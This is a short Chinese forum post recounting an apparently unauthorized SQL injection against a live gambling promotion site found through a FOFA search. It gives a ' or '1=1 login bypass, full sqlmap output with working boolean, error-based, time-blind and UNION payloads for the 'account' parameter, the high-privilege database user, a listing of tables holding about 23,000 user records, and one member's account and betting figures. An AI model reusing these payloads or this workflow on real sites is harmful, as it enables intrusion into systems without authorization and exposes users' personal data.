一次BC的sql注入

fofa上无意搜了一个活动页面

然后用万能密码'or '1=1 测试了下 发现了注入

会员账号 当前VIP等级 累积有效投注 距离晋级需有效投注 晋级彩金
a4414322 VIP2 726466 273534 888

下面就丢sqlmap测试


Parameter: account (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment

Payload: account=1' OR NOT 2852=2852#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY c

ause (FLOOR)
Payload: account=1' AND (SELECT 1925 FROM(SELECT COUNT(*),CONCAT(0x717a6a76
1,(SELECT (ELT(1925=1925,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM INFORMATION_
CHEMA.PLUGINS GROUP BY x)a)-- eJYX

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: account=1' OR SLEEP(5)-- sDYH

Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: account=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL

,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7671,0x4679694352716e6f584e52777562656b6655
a49567848774e4e697a6d56567768506a6d476c7a78,0x7170707671),NULL,NULL,NULL#

[13:29:41] [INFO] testing MySQL
[13:29:41] [INFO] confirming MySQL
[13:29:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 8.1 or 2012 R2

back-end DBMS: MySQL >= 5.0.0
[13:29:42] [INFO] fetching current user
current user: '[email protected]'

高权限 接下来看了下用户是2万多人

Database: vip
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| vip_user_month | 27464 |
| vip_reg | 24480 |
| vip_user | 23294 |
| sy_stock_info_admin | 16002 |
| zp_user | 2331 |
| reg_info | 1943 |
| letter | 508 |
| zp_jilu | 502 |
| letterread | 317 |
| followinfo | 197 |
| menu_show_nr | 122 |
| ceshi | 109 |
| vip_gz | 104 |
| tjfriends_user_ls | 80 |
| sy_tongji | 65 |
| zxd_qd_jilu | 53 |
| tjfriends_user | 50 |
| hddt | 47 |
| vip_gz_mfcj | 43 |
| powerinfo | 42 |
| zp_jx | 40 |
| cdkey | 19 |
| fx_ad | 14 |
| menu_show | 12 |
| shishicai | 11 |
| liuhe_time | 10 |
| webinfo | 10 |
| zp_time | 8 |
| department | 7 |
| fx_show | 7 |
| phone_info | 7 |
| sy_company_info | 7 |
| url_show | 5 |
| sy_warehouse_info | 4 |
| zxd_jf_jilu | 4 |
| kanjia | 3 |
| sy_distributor_info | 3 |
| sy_varieties_info | 3 |
| zxd_sp_kind | 3 |
| fx_shipin | 2 |
| info_kind | 2 |
| liuhe | 2 |
| liuhe_total | 2 |
| menu_kind | 2 |
| zxd_qdjf | 2 |
| fx_webad | 1 |
| fx_yuming | 1 |
| info_show | 1 |

一般活动站都是和主站没有关联的 还请各位大牛多指点一二

  • 通过
  • 未通过

0 投票者

好水

活动站是这样 主要第一次发 哈哈